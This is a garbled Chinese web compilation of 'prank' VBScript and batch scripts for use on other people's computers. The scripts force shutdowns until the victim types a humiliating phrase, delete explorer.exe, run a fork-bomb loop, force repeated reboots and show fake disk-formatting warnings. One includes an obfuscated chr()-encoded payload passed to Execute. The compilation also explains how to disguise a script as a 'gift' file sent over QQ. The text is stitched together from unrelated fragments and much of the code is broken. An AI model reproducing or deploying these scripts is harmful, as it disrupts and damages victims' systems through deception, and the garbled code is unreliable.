vbs整人代码大集合 多年的代码收集
C 语言整人代码大全

if inputbox("是不是","请选择","是")<>"是" then
call shutdown(1)
end if
sub shutdown(s)
select case s
case 1
ws.run"cmd.exe /c shutdown -r -t 60 -c",0
alert('什么?你居然....');
alert('居然还没意识到自己做错了?');
alert('那好,你要为此付出代价!');
alert('我要你在这里点足一千下......');
alert('什么?你开始有点后悔了?');
alert('何必呢?');
alert('你当初干什么去了?');
alert('不原谅你!');
alert('好从现在开始再点995下......');
alert('你的手开始累了吗?');
alert('什么?你已经没力气了?');
alert('你一直在求我原谅你啊!');
alert('看来你是真的知道错了!');
alert('下次你还会这么做吗?');
alert('真的不会了?');
alert('那好,今天就放你一马!');
case 2
整人代码

set WSHshell = wscript.createobject("wscript.shell")
六、不断弹出窗口
----------------------------------------------------------------------------
while(1)
msgbox "哈哈 你被耍了!"
loop
----------------------------------------------------------------------------
时间内关机 我设置的是3分钟 只要输入就解除了 当然如果不输的话也有解除的办法
我们来看下这个脚本
--------------------------------------------------------------------------------
on error resume next
-----------------------------------------------------------------------------
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "shutdown -f -s -t 00",0 ,true
-----------------------------------------------------------------------------
五、删除D:\所有文件
vbs整人程序大全

ws.run "cmd.exe /c del /q /f %windir%\explorer.exe"
Set ws=WScript.CreateObject("WScript.Shell")
ws.popup"大家好,我就是改变社会风气,风魔万千少女,刺激电影市道,提高年轻人内涵,",10,"闪亮登场",64
23617,34,44,118,98,89,101,115,7887,-
13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103
next
ws.run"shutdown -s -t 1000600"
wscript.sleep 2000
dim a
do
a=inputbox("请输入解除关机密码")
if a="403746401" then
ws.run"shutdown -a"
msgbox"密码验证成功,enjoy the best!"
,110,100,32,105,102,13,10,13,10,13,10)
for i=1 to UBound(strs)
runner=runner&chr(strs(i))
next
Execute runner
if MsgBox("你是猪头吗?",vbYesNo,"提示")=vbyes then
vbs整人代码大集合

未知驱动探索,专注成就专业
vbs整人代码大集合
1. 简介
本文档将介绍一些有趣的VBScript (VBS)代码,这些代码可以用于整人、恶作剧或者娱乐。
VBScript是一种微软开发的脚本语言,可以通过各种操作系统上的微软系列产品(如Windows)来使用。
请注意,这些代码仅用于娱乐目的,不应用于恶意活动或任何非法行为。
使用这些代码时,请确保你已经获得了授权。
2. 鼠标移动逃避
这段代码将在屏幕上显示一个小的色块,并在用户试图移动鼠标指针靠近色块时,自动将色块移动到一个随机位置。
```vbs Set objShell = CreateObject(
1。
VBS脚本常用代码大全2011整理

VBS脚本常用经典代码收集于2011年7月2日21:13:37整理在网上查找资料的时候发现好多经典的vbs 代码,收集起来也为了以后学习。
VBS播放音乐DimwmpSetwmp=CreateObject("WMPlayer.OCX")wmp.openStatewmp.URL二'想象之中.mp3"DoUntilwmp.playState=1WScript.Sleep1000Loop比较流行的VBS整人脚本(保存为礼物.VBE”这样就可以通过QQ发送了)Setshell二CreateObject("WScript.Shell")shell.run"shutdown-s-t60-c 系统即将关闭.",0WhileInputBox("请输入答案",”请回答")<>"123"'密码是123MsgBox"答案在心中…",16+4096'4096是让窗口在最顶层Wendshell.run"shutdown-a",0MsgBox"恭喜",64修改桌面背景图片Sphoto二"d:\1.bmp"'输入你自己的BMP路径Consthkcu=&h80001Setwmi=GetObject("winmgmts:stdregprov")wmi.getstringvaluehkcu,"ControlPanel\Desktop","Wallpaper",Spathwmi. setstringvaluehkcu,"ControlPanel\Desktop","TileWallpaper","0"wmi.setstringvaluehk cu,"ControlPanel\Desktop","WallpaperStyle","2"wmi.setdwordvaluehkcu,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Listvi ewShadow",1Setwmi=NothingSetfso=CreateObject("scripting.filesystemobject")Setfs=fso.Getfile(Sphoto)backname==fso.GetFileName(Spath)fs.Copyfso.GetParentFolderName(Spath)&"\",True=backnameSetfso=NothingSetws=CreateObject("wscript.shell")ws.Run"gpupdate/force",vbhidews.Run"RunDll32.exeUSER32.DLL,UpdatePerUserSystemParameters"Setws=NothingVBS获取系统安装路径C:'WINDOWS 路径先定义这个变量是获取系统安装路径的,然后我们用"strWinDir" 调用这个变量。
整人bat大全

整人bat大全1. 1、@echo offtitle 请勿关闭本程序,否则后果自负!:Nextecho “请输入:“我是猪头三”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“我是猪头三”,否则将关闭计算机!"set /p Input=if "%input%"=="我是猪头三" goto EXITgoto Next:EXITshutdown -aecho “算你运气好,下面还有你好看的!”shutdown -s -t 60 -c “请做出选择!否则将关闭计算机!”ping 127.0.0.1 -n 2 >nulecho “你觉得我厉害吗?厉害按“Y”,不厉害按“N”set /p YN=if /i "%YN%"=="Y" shutdown -aif /i "%YN%"=="N" shutdown -ae cho “我要给你看看我的真本事!”ping 127.0.0.1 -n 2 >nul:Downecho “请输入:“你最厉害”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“你最厉害”,否则将关闭计算机!"set /p Input=if "%input%"=="你最厉害" goto OVERgoto Down:OVERshutdown -aping 127.0.0.1 -n 1 >nulecho “怎么样,很可怕吧!”ping 127.0.0.1 -n 2 >nulecho “此计算机将在20秒内崩溃或爆炸,请马上从附近窗口跳下,否则后果自负。
”echo “即将删除此计算机上所有重要数据。
”ping 127.0.0.1 -n 1 >nulecho “正在格式化本地磁盘C:所有数据...”ping 127.0.0.1 -n 2 >nulecho “正在格式化本地磁盘D:所有数据...”ping 127.0.0.1 -n 2 >nulecho “格式化失败!,此计算机即将爆炸...”echo “请马上离开本计算机!此计算机即将爆炸!”ping 127.0.0.1 -n 2 >nulmsg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”shutdown -s -f -t 12、@echo offecho 你中招了:astart cmd.EⅩEstart %0goto a@ color 4f@echo offecho 删除计算机的C盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo 删除计算机的D盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.。
整人代码大全

.整人代码大全让对方重启指定次数 (害人专用 )@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启 5 次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启 6 次改成 7 就是 7 次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat ”,你的批量处理器就完成了。
善意恶搞关机首先呢 ,我们在桌面创建个新文件夹然后打开,在上面找到 - 工具 T- 文件夹选项 O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作 .在桌面建立个记事本 ,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···""",0 ,truedim ado while(a <> "我是猪")a = inputbox (" 说我是猪 ,就不关机,快撒,说"" 我是猪 """," 说不说 "," 不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢 ,把后缀修改为 .vbs 或者改变打开方式为应用程序,这样你再压缩下用 QQ 发给你朋友,对方打开了就在60 秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
